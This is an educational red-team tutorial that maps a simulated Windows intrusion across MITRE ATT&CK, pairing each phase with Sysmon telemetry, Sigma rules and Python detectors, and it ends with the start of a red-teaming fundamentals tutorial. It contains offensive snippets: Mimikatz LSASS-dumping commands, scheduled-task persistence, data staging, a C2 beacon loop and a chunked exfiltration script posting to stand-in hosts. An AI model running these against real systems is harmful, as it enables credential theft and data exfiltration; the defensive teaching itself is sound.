The Attack Lifecycle: Reconnaissance to Exfiltration
Objective: Understand how a real-world adversary operation unfolds across the full MITRE ATT&CK Enterprise lifecycle — from pre-engagement reconnaissance through to data exfiltration — and learn how each phase is executed by authorized red teams and detected and disrupted by defenders.
1. Red Teaming & the Attack Lifecycle — Why It Matters
MITRE ATT&CK categorizes the tactics, techniques, and procedures (TTPs) used by real-world threat actors into a standardized matrix of adversary behaviors spanning the entire attack lifecycle. It is organized into three layers:
- Tactics — the tactical goals an adversary pursues (the “why”).
- Techniques — the actions taken to achieve those goals (the “how”).
- Procedures — the concrete technical steps to perform a technique.
The Enterprise matrix contains 14 tactics, beginning with Reconnaissance (TA0043) and ending with Impact. Unlike Lockheed Martin’s linear Cyber Kill Chain, ATT&CK is a behavior catalog — a red team uses it to plan a realistic operation, and a blue team uses the same IDs to measure detection coverage. This tutorial walks a simulated Windows enterprise engagement phase by phase, pairing each offensive step with its detection telemetry.
2. Pre-Engagement: Rules of Engagement and Scoping
No technique in this tutorial is legal without written authorization. A red team operation begins with a signed Rules of Engagement (RoE) document that fixes:
| Scope Item | Purpose |
|---|---|
| In-scope IP ranges / domains | Bounds active scanning (T1595) and exploitation |
| Excluded systems | Protects production / safety-critical assets |
| Permitted TTPs | Authorizes phishing, credential access, lateral movement |
| Engagement window | Defines start/stop times and blackout periods |
| Emergency contacts | Enables immediate stand-down if impact escalates |
| Data handling | Governs how collected/exfiltrated data is stored and destroyed |
Threat-model selection (e.g., emulating a specific intrusion set) drives which techniques are exercised. Everything that follows assumes explicit, documented authorization.
3. Reconnaissance & Resource Development (TA0043, TA0042)
Reconnaissance (TA0043) gathers information about the target environment for use in later phases. It splits into passive collection — which never touches target infrastructure — and active scanning.
Passive OSINT pulls from public data sources: WHOIS, Shodan, LinkedIn, and certificate transparency logs (T1590, T1589, T1593). Certificate transparency is especially valuable for surfacing subdomains and shadow infrastructure.
```bash
# Enumerate subdomains from certificate transparency logs (T1590)
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' | sort -u
# Passive registration metadata (T1590)
whois example.com | grep -Ei 'Registrar|Name Server|Creation'
```
Active Scanning (T1595) — port and service discovery with tools like Nmap — is the most prominent Reconnaissance technique and the first activity that generates target-side telemetry.
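The `jq`/`sort -u` pipeline above hides two quirks of the crt.sh format that matter when a defender runs the same query against their own domains to spot shadow infrastructure: one record's `name_value` can hold several newline-separated names, and wildcard entries (`*.dev.example.com`) still reveal a base label. The parser below is an added example, not part of the original tutorial; the JSON payload is constructed to mirror crt.sh's output shape, and `new_hosts` compares a pull against a previous baseline (the baseline set is an assumption).

```python
"""Parse crt.sh JSON into unique in-zone hostnames and diff against a baseline.

Added example, not from the original tutorial. SAMPLE_CRTSH_JSON is a
constructed payload shaped like crt.sh's `output=json` response.
"""
import json

# Constructed sample for the query %.example.com (not real crt.sh data).
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.example.com\nexample.com"},          # two names in one record
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "*.dev.example.com"},                    # wildcard certificate
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "VPN.Example.com\nwww.example.com"},      # mixed case, duplicate
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "staging.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.notexample.com"},                   # substring match, not in zone
])


def parse_crtsh(payload: str, zone: str) -> list[str]:
    """Return sorted unique hostnames under `zone` from a crt.sh JSON document.

    - splits multi-name records on newlines
    - lower-cases names (DNS is case-insensitive)
    - strips a leading '*.' so wildcard certs still surface the base label
    - drops names outside the zone (crt.sh's %-query is a substring match)
    """
    zone = zone.lower().lstrip(".")
    names: set[str] = set()
    for record in json.loads(payload):
        for raw in record.get("name_value", "").split("\n"):
            host = raw.strip().lower()
            if host.startswith("*."):
                host = host[2:]
            if host == zone or host.endswith("." + zone):
                names.add(host)
    return sorted(names)


def new_hosts(baseline: set[str], current: list[str]) -> list[str]:
    """Hosts in the latest pull that were absent from the previous baseline."""
    return sorted(set(current) - baseline)


if __name__ == "__main__":
    hosts = parse_crtsh(SAMPLE_CRTSH_JSON, "example.com")
    print("\n".join(hosts))
    # Assumed baseline from the previous monitoring run.
    print("new:", new_hosts({"example.com", "www.example.com"}, hosts))
```

Run on a schedule against your own zones, the `new_hosts` diff is the practical alert: a certificate issued for a name nobody registered internally is exactly the shadow infrastructure the text describes.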
Resource Development (TA0042) prepares the operational toolkit: acquiring infrastructure (T1583), establishing accounts (T1585), and obtaining or developing capabilities (T1588, T1587). For a red team this means standing up redirectors, C2 servers, and phishing domains before any contact with the target.

4. Initial Access (TA0001)
Initial Access (TA0001) is the most frequently employed tactic — it establishes the adversarial foothold. The dominant techniques are Phishing (T1566) and Valid Accounts (T1078), the latter gaining significant prominence in 2024.
| Technique | MITRE ID | Foothold Vector |
|---|---|---|
| Spearphishing Attachment | T1566.001 | Weaponized document delivered by email |
| Spearphishing Link | T1566.002 | Credential-harvesting or payload URL |
| Exploit Public-Facing Application | T1190 | Vulnerable internet-facing service |
| External Remote Services | T1133 | Exposed VPN/RDP/Citrix gateway |
| Valid Accounts | T1078 | Reused or leaked credentials |
In a typical spearphishing scenario, a pretext email lures a user (T1204, User Execution) into opening an attachment that spawns a child process — the handoff point into the Execution tactic.
5. Execution & Persistence (TA0002, TA0003)
Execution (TA0002) runs adversary-controlled code on the host. Command and Scripting Interpreter (T1059) — particularly PowerShell (T1059.001) and the Windows command shell (T1059.003) — is the workhorse, alongside WMI (T1047) and scheduled tasks (T1053).
Persistence (TA0003) ensures the foothold survives reboots and logoffs. Common techniques are Boot or Logon Autostart Execution (T1547) and Scheduled Task/Job (T1053.005). The following illustrates a benign scheduled-task persistence pattern and the events it generates.
```powershell
# Illustrative persistence via scheduled task (T1053.005)
$action = New-ScheduledTaskAction -Execute "powershell.exe" `
    -Argument "-NoProfile -File C:\ProgramData\update.ps1"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "SystemUpdateCheck" `
    -Action $action -Trigger $trigger -RunLevel Highest
```
This single command produces Windows Event ID 4698 (scheduled task created) and Sysmon Event ID 1 (process creation) with powershell.exe as the task action — a high-fidelity detection pair.
6. Privilege Escalation, Defense Evasion & Credential Access (TA0004, TA0005, TA0006)
Privilege Escalation (TA0004) seeks elevated rights via Process Injection (T1055), Valid Accounts (T1078), and Create or Modify System Process (T1543). Defense Evasion (TA0005) then hides the activity — Indicator Removal (T1070) clears event logs, and Impair Defenses (T1562) disables security tooling.
Credential Access (TA0006) harvests authentication material. OS Credential Dumping: LSASS Memory (T1003.001) reads cleartext credentials and hashes from the LSASS process. The Mimikatz syntax below is a reference for understanding what the technique reads, not a functional payload.
```text
# Mimikatz syntax reference — LSASS memory read (T1003.001)
privilege::debug            # acquire SeDebugPrivilege
sekurlsa::logonpasswords    # parse credential material from LSASS memory
```
The cross-process read of lsass.exe is exactly what Sysmon Event ID 10 (ProcessAccess) is tuned to catch, typically on a GrantedAccess mask of 0x1410.
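The 0x1410 mask the text cites is PROCESS_VM_READ (0x10) combined with PROCESS_QUERY_INFORMATION (0x400) and PROCESS_QUERY_LIMITED_INFORMATION (0x1000); matching only that literal value misses dumpers that open LSASS with PROCESS_ALL_ACCESS or other supersets. The detector below, an added example and not code from the tutorial, decodes the mask and flags any memory-reading right against lsass.exe. The Sysmon Event ID 10 records and the allow-list of legitimate source images are constructed assumptions; tune the allow-list to your own baseline.

```python
"""Flag Sysmon Event ID 10 (ProcessAccess) records that read lsass.exe memory.

Added example, not from the original tutorial. SAMPLE_EVENTS are constructed
Sysmon 10 records; BENIGN_SOURCES is a hypothetical allow-list.
"""
# Windows PROCESS_* access rights (subset relevant to memory reads)
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Any of these rights on lsass.exe is enough to pull credential material.
DUMP_RIGHTS = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION

# Hypothetical allow-list of images that legitimately open LSASS (lower-case).
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon Event ID 10 samples (subset of the real field set).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\tool.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1410"},
]


def decode_mask(mask: str) -> int:
    """Sysmon logs GrantedAccess as a hex string such as '0x1410'."""
    return int(mask, 16)


def suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allow-listed process opens lsass.exe with a memory-reading right."""
    if event.get("EventID") != 10:
        return False
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if event["SourceImage"].lower() in BENIGN_SOURCES:
        return False
    return bool(decode_mask(event["GrantedAccess"]) & DUMP_RIGHTS)


def find_lsass_readers(events: list[dict]) -> list[str]:
    """Source images that warrant triage, in event order."""
    return [e["SourceImage"] for e in events if suspicious_lsass_access(e)]


if __name__ == "__main__":
    for image in find_lsass_readers(SAMPLE_EVENTS):
        print("LSASS memory access from", image)
```

The third sample (taskmgr.exe with 0x1000, query-limited only) is deliberately not flagged: it never gains a VM_READ right, which is the distinction a literal `GrantedAccess == 0x1410` rule cannot express.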
7. Discovery (TA0007)
Discovery (TA0007) maps the internal environment once inside. Built-in commands provide low-noise enumeration of accounts (T1087), permission groups (T1069), remote systems (T1018), and host configuration (T1082, T1016).
```powershell
# Internal recon mapped to Discovery techniques
whoami /all                         # T1033 — user, groups, privileges
Get-ADUser -Filter *                # T1087 — domain accounts
Get-ADGroupMember "Domain Admins"   # T1069 — privileged group membership
nltest /domain_trusts               # T1482 — trust relationships
Get-ADComputer -Filter *            # T1018 — remote systems
```
Graph-based AD enumeration with SharpHound (the BloodHound collector) accelerates this phase by mapping attack paths to high-value objects. Because SharpHound queries many hosts in rapid succession, it surfaces in Sysmon Event ID 3 (network connection) as a fan-out of LDAP and SMB connections from a single process.
8. Lateral Movement (TA0008)
Lateral Movement (TA0008) expands the foothold toward sensitive systems after internal reconnaissance. In Windows-heavy environments the primary techniques are:
| Technique | MITRE ID | Port / Mechanism |
|---|---|---|
| Remote Desktop Protocol | T1021.001 | TCP 3389 |
| SMB / Windows Admin Shares | T1021.002 | TCP 445 (ADMIN$, C$) |
| Windows Remote Management | T1021.006 | TCP 5985/5986 (WinRM) |
| Pass the Hash | T1550.002 | NTLM hash reuse |
| Kerberoasting | T1558.003 | TGS request for service accounts |
Pass the Hash reuses a captured NTLM hash to authenticate without the plaintext password. Kerberoasting requests service tickets for accounts with SPNs, then cracks them offline. A Ticket Encryption Type of 0x17 (RC4-HMAC) instead of 0x12 (AES256) across many Windows Event ID 4769 records in a short window is a strong Kerberoasting indicator. SMB-based movement via PsExec also leaves Sysmon Event ID 17/18 named-pipe artifacts.
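The 0x17 indicator above is only strong when it is counted per requester over a short window: a single legacy service that still negotiates RC4 produces 0x17 tickets all day, while a Kerberoasting run requests tickets for many different SPNs in seconds. The detector below, an added example rather than code from the tutorial, applies that distinction to constructed Event ID 4769 records. The five-minute window and threshold of three distinct SPNs are assumed starting values; computer accounts (`$`) are skipped because their tickets are routine.

```python
"""Count distinct RC4 (0x17) service-ticket requests per requester inside a window.

Added example, not from the original tutorial. SAMPLE_4769 holds constructed
Windows Security 4769 records; WINDOW and THRESHOLD are assumed tuning values.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType the text flags
WINDOW = timedelta(minutes=5)  # assumed
THRESHOLD = 3                  # distinct RC4 SPNs per requester inside WINDOW (assumed)


def _ev(ts, user, ip, spn, etype=RC4_HMAC):
    """Build a constructed 4769 record with the fields the detector reads."""
    return {"TimeCreated": ts, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": spn, "TicketEncryptionType": etype, "Status": "0x0"}


SAMPLE_4769 = [
    # jdoe pulls four RC4 tickets for four different SPNs in 90 seconds
    _ev("2024-05-01T09:00:00", "jdoe@CORP.LOCAL", "10.0.0.25", "svc_sql"),
    _ev("2024-05-01T09:00:10", "jdoe@CORP.LOCAL", "10.0.0.25", "svc_web"),
    _ev("2024-05-01T09:00:20", "jdoe@CORP.LOCAL", "10.0.0.25", "svc_backup"),
    _ev("2024-05-01T09:00:25", "jdoe@CORP.LOCAL", "10.0.0.25", "FS01$"),             # computer account, ignored
    _ev("2024-05-01T09:00:30", "jdoe@CORP.LOCAL", "10.0.0.25", "CIFS/fs01", "0x12"),  # AES256, normal
    _ev("2024-05-01T09:01:30", "jdoe@CORP.LOCAL", "10.0.0.25", "svc_mssql2"),
    # asmith hits one legacy RC4-only service repeatedly: expected noise
    _ev("2024-05-01T09:00:05", "asmith@CORP.LOCAL", "10.0.0.40", "svc_legacyapp"),
    _ev("2024-05-01T09:02:05", "asmith@CORP.LOCAL", "10.0.0.40", "svc_legacyapp"),
    _ev("2024-05-01T09:03:05", "asmith@CORP.LOCAL", "10.0.0.40", "svc_legacyapp"),
]


def kerberoast_candidates(events, window=WINDOW, threshold=THRESHOLD):
    """Return {(user, ip): sorted SPNs} for requesters whose distinct successful
    RC4 TGS requests reach `threshold` inside any `window`."""
    per_requester = defaultdict(list)
    for e in events:
        if e.get("TicketEncryptionType") != RC4_HMAC or e.get("Status") != "0x0":
            continue
        spn = e["ServiceName"]
        if spn.endswith("$") or spn.lower() == "krbtgt":
            continue  # machine accounts and the TGT service are not roastable targets
        key = (e["TargetUserName"], e["IpAddress"])
        per_requester[key].append((datetime.fromisoformat(e["TimeCreated"]), spn))

    hits = {}
    for key, requests in per_requester.items():
        requests.sort()
        for i, (t0, _) in enumerate(requests):
            spns = {spn for t, spn in requests[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                hits[key] = sorted(spns)
                break
    return hits


if __name__ == "__main__":
    for (user, ip), spns in kerberoast_candidates(SAMPLE_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for {len(spns)} SPNs: {spns}")
```

The distinct-SPN count is what separates the two requesters: asmith's three 0x17 events collapse to one service name and never reach the threshold, while jdoe's burst does.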

9. Collection & Command and Control (TA0009, TA0011)
Collection (TA0009) gathers target data prior to exfiltration: Data from Local System (T1005), Data from Network Shared Drive (T1039), Email Collection (T1114), and Automated Collection (T1119). Collected data is then archived (T1560) to shrink and obscure it.
```powershell
# Staging collected data (T1560) before exfiltration
Compress-Archive -Path C:\Users\jdoe\Documents\*.docx `
    -DestinationPath C:\ProgramData\stage.zip
certutil -encode C:\ProgramData\stage.zip C:\ProgramData\stage.b64
```
Command and Control (TA0011) maintains the operator channel. Application Layer Protocol: Web Protocols (T1071.001) blends C2 into normal HTTPS, defeating deep packet inspection; Encrypted Channel (T1573) and Protocol Tunneling (T1572) add further cover. Mature implants beacon low-and-slow with jittered sleep to evade volumetric detection.
```python
# Conceptual HTTPS beacon loop (T1071.001) — illustrative, not implant code
import time, random, requests

while True:
    task = requests.get("https://cdn.example-c2.test/poll", verify=True)
    # ... process task, return results out-of-band ...
    sleep = 60 + random.randint(-15, 15)  # jitter to flatten beacon timing
    time.sleep(sleep)
```
10. Exfiltration (TA0010)
In Exfiltration (TA0010) the adversary steals the staged data. Because data is already collected and archived, the focus is moving it out without tripping volume or destination alarms.
| Technique | MITRE ID | Channel |
|---|---|---|
| Exfiltration Over C2 Channel | T1041 | Existing C2 path |
| Exfiltration Over Web Service | T1567 | Cloud storage / SaaS |
| Exfiltration Over Alternative Protocol | T1048 | DNS, FTP, etc. |
| Automated Exfiltration | T1020 | Scripted transfer |
| Scheduled Transfer | T1029 | Timed to blend with traffic |
| Data Transfer Size Limits | T1030 | Chunking to stay under thresholds |
Exfiltration Over Web Service (T1567) is favored because hosts already communicate with popular SaaS providers, firewall rules likely permit that traffic, and provider SSL/TLS hides the payload. Chunking (T1030) keeps each transfer below detection thresholds.
```python
# Conceptual chunked exfil over a web service (T1567 + T1030) — illustrative
import requests

CHUNK = 512 * 1024  # cap per request to stay under size thresholds
with open("stage.b64", "rb") as f:
    while (block := f.read(CHUNK)):
        requests.post("https://storage.example-saas.test/upload",
                      data=block, verify=True)
```
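Chunking defeats a per-transfer size rule, but not one that sums uploads per source and destination over time. Sysmon Event ID 3 carries no byte counts, so this aggregation belongs on proxy, firewall or DLP egress logs. The detector below is an added example, not code from the tutorial; its proxy log lines are constructed, and the per-request and aggregate thresholds are assumed values chosen so that every individual upload passes the first while the sum trips the second.

```python
"""Aggregate upload volume per (source, destination) over a sliding window.

Added example, not from the original tutorial. PROXY_LOG is a constructed
log (fields: time src method host bytes_out status); the thresholds and
window are assumptions to tune per environment.
"""
from collections import defaultdict
from datetime import datetime, timedelta

PER_REQUEST_LIMIT = 1_000_000  # assumed per-transfer DLP threshold the chunking stays under
AGGREGATE_LIMIT = 2_000_000    # assumed aggregate threshold per (src, host) per window
WINDOW = timedelta(minutes=10)

PROXY_LOG = """\
2024-05-01T10:00:00 10.0.0.25 POST storage.example-saas.test 524288 200
2024-05-01T10:00:45 10.0.0.25 POST storage.example-saas.test 524288 200
2024-05-01T10:01:30 10.0.0.25 POST storage.example-saas.test 524288 200
2024-05-01T10:02:15 10.0.0.25 GET cdn.example-saas.test 1200 200
2024-05-01T10:02:40 10.0.0.25 POST storage.example-saas.test 524288 200
2024-05-01T10:03:50 10.0.0.25 POST storage.example-saas.test 524288 200
2024-05-01T10:01:00 10.0.0.40 POST mail.example-saas.test 900000 200
2024-05-01T10:30:00 10.0.0.40 POST mail.example-saas.test 900000 200
"""


def parse_line(line: str) -> dict:
    ts, src, method, host, sent, status = line.split()
    return {"time": datetime.fromisoformat(ts), "src": src, "method": method,
            "host": host, "bytes": int(sent), "status": int(status)}


def parse_log(log: str) -> list[dict]:
    return [parse_line(ln) for ln in log.strip().splitlines() if ln.strip()]


def largest_single_upload(log: str) -> int:
    """Biggest single POST/PUT; shows the per-request rule alone sees nothing."""
    return max(r["bytes"] for r in parse_log(log) if r["method"] in ("POST", "PUT"))


def egress_offenders(log: str, window=WINDOW, limit=AGGREGATE_LIMIT) -> dict:
    """Return {(src, host): bytes} for pairs whose uploads inside any `window`
    exceed `limit`, regardless of how small each request was."""
    uploads = defaultdict(list)
    for r in parse_log(log):
        if r["method"] in ("POST", "PUT"):
            uploads[(r["src"], r["host"])].append((r["time"], r["bytes"]))

    flagged = {}
    for key, transfers in uploads.items():
        transfers.sort()
        for i, (t0, _) in enumerate(transfers):
            total = sum(b for t, b in transfers[i:] if t - t0 <= window)
            if total > limit:
                flagged[key] = total
                break
    return flagged


if __name__ == "__main__":
    print("largest single upload:", largest_single_upload(PROXY_LOG))
    for (src, host), total in egress_offenders(PROXY_LOG).items():
        print(f"{src} -> {host}: {total} bytes uploaded within {WINDOW}")
```

The 10.0.0.40 host sends two 900 kB uploads half an hour apart and stays clean; 10.0.0.25 sends five 512 kB chunks in under four minutes and is flagged, even though no single request approached the per-request limit.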
11. Common Attacker Techniques Across the Lifecycle
| Technique | Description |
|---|---|
| Active Scanning (T1595) | Enumerate exposed services and vulnerable software |
| Phishing (T1566) | Deliver payloads or harvest credentials via email |
| PowerShell Execution (T1059.001) | Run fileless tooling in-memory |
| Scheduled Task Persistence (T1053.005) | Survive reboot via task triggers |
| LSASS Dumping (T1003.001) | Extract credentials from process memory |
| Pass the Hash (T1550.002) | Reuse NTLM hashes for lateral auth |
| Kerberoasting (T1558.003) | Crack service-account tickets offline |
| Web Protocol C2 (T1071.001) | Hide command channel in HTTPS |
| Exfil Over Web Service (T1567) | Steal data through trusted SaaS |
12. Defensive Strategies & Detection
Detection is most effective when Sysmon events are chained across phases rather than alerted in isolation.
| Sysmon Event ID | Catches | Lifecycle Phase |
|---|---|---|
| 1 | Process creation | Execution, Discovery, Lateral Movement |
| 3 | Network connection | Recon fan-out, C2, exfil volume |
| 7 | Image load | DLL injection into svchost.exe/explorer.exe |
| 10 | Process access | LSASS dumping (T1003.001) |
| 11 | File create | Staging (*.zip), ticket exfil (*.kirbi) |
| 17/18 | Named pipe create/connect | PsExec / SMB movement |
| 22 | DNS query | Abnormal lookups during recon/C2 |
Pair Sysmon with Windows Security auditing: Event 4624 (logon), 4688 (process + command line), 4698 (scheduled task), 4769 (Kerberos service ticket — watch for 0x17), and 5140/5156 (share access and allowed connections). Enable Audit Process Creation with command-line logging, PowerShell Script Block Logging, and Audit Kerberos Service Ticket Operations. ETW providers such as Microsoft-Windows-PowerShell, Microsoft-Windows-Kernel-Network, and Microsoft-Windows-SMBClient deepen visibility.
A representative Sigma rule chains suspicious PowerShell with an outbound connection:
```yaml
title: PowerShell Process With Outbound Network Connection
logsource:
  product: windows
  service: sysmon
detection:
  proc:
    EventID: 1
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - 'DownloadString'
      - 'IEX'
  net:
    EventID: 3
    Image|endswith: '\powershell.exe'
  condition: proc and net
level: high
```
MITRE ATT&CK mapping for the primary abuse primitives:
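One caveat on the sketch above: a classic single-event Sigma rule evaluates one record at a time, so `proc and net` cannot by itself join an Event ID 1 to a later Event ID 3 from the same process; that join is done with Sigma's correlation-rule extension or in the SIEM. The Python below, an added example and not code from the tutorial, shows the join the rule intends: key the two events on Sysmon's ProcessGuid and require the network connection to follow the suspicious process start within a window. The Sysmon records and the five-minute window are constructed assumptions.

```python
"""Join Sysmon Event ID 1 (suspicious PowerShell) to Event ID 3 by ProcessGuid.

Added example, not from the original tutorial. SAMPLE_SYSMON records are
constructed; WINDOW is an assumed correlation window.
"""
from datetime import datetime, timedelta

SUSPICIOUS_ARGS = ("-enc", "downloadstring", "iex")  # same terms as the Sigma sketch, lower-cased
WINDOW = timedelta(minutes=5)                          # assumed
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_SYSMON = [
    # A1: encoded command followed by an outbound connection 12 s later -> hit
    {"EventID": 1, "UtcTime": "2024-05-01 09:00:00.000", "ProcessGuid": "{A1}",
     "Image": PS_IMAGE, "CommandLine": "powershell.exe -NoProfile -enc <base64-placeholder>"},
    {"EventID": 3, "UtcTime": "2024-05-01 09:00:12.000", "ProcessGuid": "{A1}",
     "Image": PS_IMAGE, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # B2: benign command line with a WinRM connection -> no hit
    {"EventID": 1, "UtcTime": "2024-05-01 09:05:00.000", "ProcessGuid": "{B2}",
     "Image": PS_IMAGE, "CommandLine": "powershell.exe -Command Get-Date"},
    {"EventID": 3, "UtcTime": "2024-05-01 09:05:03.000", "ProcessGuid": "{B2}",
     "Image": PS_IMAGE, "DestinationIp": "10.0.0.5", "DestinationPort": 5985},
    # C3: download cradle but no network event (e.g. egress denied) -> no hit
    {"EventID": 1, "UtcTime": "2024-05-01 09:10:00.000", "ProcessGuid": "{C3}",
     "Image": PS_IMAGE, "CommandLine": "powershell.exe -c IEX (DownloadString placeholder)"},
]


def parse_utc(value: str) -> datetime:
    """Sysmon UtcTime format: 'YYYY-MM-DD HH:MM:SS.mmm'."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def is_suspicious_powershell(event: dict) -> bool:
    """Mirror the `proc` selection: powershell.exe with one of the flagged substrings."""
    if event["EventID"] != 1 or not event["Image"].lower().endswith(r"\powershell.exe"):
        return False
    cmd = event["CommandLine"].lower()
    return any(term in cmd for term in SUSPICIOUS_ARGS)


def correlate(events: list[dict], window: timedelta = WINDOW) -> list[dict]:
    """Return one hit per Event ID 3 that follows a suspicious Event ID 1
    from the same ProcessGuid within `window`."""
    starts = {e["ProcessGuid"]: e for e in events if is_suspicious_powershell(e)}
    hits = []
    for e in events:
        if e["EventID"] != 3:
            continue
        start = starts.get(e["ProcessGuid"])
        if start is None:
            continue
        delta = parse_utc(e["UtcTime"]) - parse_utc(start["UtcTime"])
        if timedelta(0) <= delta <= window:
            hits.append({"ProcessGuid": e["ProcessGuid"],
                         "CommandLine": start["CommandLine"],
                         "Destination": f'{e["DestinationIp"]}:{e["DestinationPort"]}',
                         "SecondsAfterStart": delta.total_seconds()})
    return hits


if __name__ == "__main__":
    for hit in correlate(SAMPLE_SYSMON):
        print(hit)
```

ProcessGuid is the right join key because Sysmon generates it per process instance; a PID is reused after the process exits and would eventually pair the wrong events.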
| Technique | MITRE ID | Detection |
|---|---|---|
| Process Injection | T1055 | Sysmon Event ID 7/10 |
| LSASS Memory Dumping | T1003.001 | Sysmon Event ID 10, GrantedAccess 0x1410 |
| Scheduled Task | T1053.005 | Event ID 4698, Sysmon Event ID 1 |
| Kerberoasting | T1558.003 | Event ID 4769, RC4 (0x17) tickets |
| Pass the Hash | T1550.002 | Event ID 4624 type 3 + NTLM anomalies |
| Web Protocol C2 | T1071.001 | Sysmon Event ID 3/22 beacon timing |
| Exfil Over Web Service | T1567 | Sysmon Event ID 3 + DLP egress volume |
Hardening per phase: minimize public attack surface and monitor certificate transparency; enforce MFA and patch internet-facing services (T1190); deploy Sysmon with Windows Event Forwarding to a SIEM; segment networks to restrict RDP/SMB; enable Credential Guard and AES256 Kerberos to eliminate RC4 Kerberoasting; and apply DLP with egress filtering against cloud-storage exfiltration.

13. Tools for Attack Lifecycle Analysis
| Tool | Description | Link |
|---|---|---|
| Sysmon | High-fidelity endpoint event logging | microsoft.com |
| ATT&CK Navigator | Visualize technique coverage and gaps | mitre-attack.github.io |
| BloodHound / SharpHound | Map AD attack paths (and detect them) | bloodhound.specterops.io |
| Volatility | Memory forensics for injection/LSASS access | volatilityfoundation.org |
| Sigma | Vendor-neutral detection rule format | sigmahq.io |
| Nmap | Active scanning and service discovery | nmap.org |
| Wireshark | Inspect C2 and exfil network traffic | wireshark.org |
For an engagement debrief, encode the simulated operation as an ATT&CK Navigator layer so the blue team can see exactly which techniques were exercised and where coverage was missing:
```json
{
  "name": "Lifecycle Engagement - 2024",
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1595", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1566", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1059", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1003", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1021", "score": 75, "color": "#f4a442" },
    { "techniqueID": "T1071", "score": 75, "color": "#f4a442" },
    { "techniqueID": "T1567", "score": 100, "color": "#e60d0d" }
  ]
}
```
Summary
- The attack lifecycle is a continuous chain of ATT&CK tactics — Reconnaissance to Exfiltration — that red teams emulate and blue teams measure with the same technique IDs.
- Early phases (TA0043, TA0042, TA0001) establish a foothold through scanning, phishing, and valid-account abuse, while mid-chain phases escalate, evade, and harvest credentials (T1055, T1003.001, T1558.003).
- Lateral movement (T1021, T1550.002) and C2 (T1071.001) expand and sustain access before staged data is archived (T1560) and exfiltrated over trusted channels (T1041, T1567).
- Detection works best by chaining Sysmon events (1, 3, 10, 11, 17/18, 22) with Windows audit IDs (4688, 4698, 4769) and Sigma rules across phases.
- Map every emulated technique into an ATT&CK Navigator layer to expose detection gaps and drive defensive hardening.
Related Tutorials
- Phishing Campaign Design: Pretexting, Lures, and Target Profiling
- Building a Red Team Lab: Infrastructure, VMs, and C2 Setup
- Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
- OSINT for People and Credentials: LinkedIn, Breach Data, and Email Harvesting
- Active OSINT: DNS, Certificate Transparency, and Subdomain Enumeration
References
- Reconnaissance, Tactic TA0043 – Enterprise | MITRE ATT&CK®
- Exfiltration, Tactic TA0010 – Enterprise | MITRE ATT&CK®
- Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
- Exfiltration Over Web Service, Technique T1567 – Enterprise | MITRE ATT&CK®
- What is the MITRE ATT&CK Framework? | Microsoft Security
- Red Teaming and MITRE ATT&CK | Red Team Development and Operations
Red Teaming Fundamentals: Mindset, Methodology, and Engagement Types
Objective: Understand what a red team engagement actually is, how it differs from vulnerability assessment and penetration testing, the adversarial mindset and methodologies that structure it, the typology of engagement formats, and how every offensive action maps back to MITRE ATT&CK to produce measurable defender value.
1. What Red Teaming Actually Is
Red teaming is objective-driven adversary simulation that tests an organization’s detection and response capability — not an exhaustive enumeration of every vulnerability. A penetration test prioritizes coverage of the attack surface; a red team engagement prioritizes realism and a targeted goal: reaching high-value assets such as executive workstations, code repositories, or financial systems while remaining undetected.
| Term | Precise Meaning |
|---|---|
| Vulnerability Assessment | Automated/semi-automated enumeration of known weaknesses; no exploitation |
| Penetration Test | Scoped, time-boxed exploitation to confirm impact; goal is coverage |
| Red Team Engagement | Objective-driven, adversary-realistic campaign testing detection & response |
| Adversary Emulation | Red team constrained to a specific threat actor’s documented TTPs, mapped to ATT&CK |
| Purple Team Exercise | Collaborative, transparent session where red and blue tune specific techniques together |
